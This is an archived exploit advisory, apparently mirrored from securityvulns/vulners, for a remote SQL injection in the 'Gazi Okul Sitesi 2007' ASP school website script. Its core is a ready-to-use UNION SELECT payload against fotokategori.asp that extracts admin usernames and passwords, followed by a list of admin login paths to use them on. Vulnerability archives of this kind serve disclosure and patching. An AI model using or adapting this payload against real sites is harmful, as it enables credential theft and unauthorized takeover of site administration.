Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16610
HistoryApr 06, 2007 - 12:00 a.m.

Gazi Okul Sitesi 2007(tr)(fotokategori.asp) Remote SQL Injection

2007-04-0600:00:00
vulners.com
15

#Title : Gazi Okul Sitesi 2007(tr)(fotokategori.asp) Remote SQL Injection Vulnerability
#Author : CoNqUeRoR
#Demo Page : http://www.gazilogo.com
#Script Page : http://www.aspindir.com/indir.asp?id=4746
#Date : 30-03-2007

#Vulnerability:

#Username & Password : /fotokategori.asp?'%20union%20select%201,2,3,password,5,6,username,8%20from%20admin

#Admin Logins : /duyuruadmin/
/defteradmin/
/haberadmin/

Special Thank: B-S-N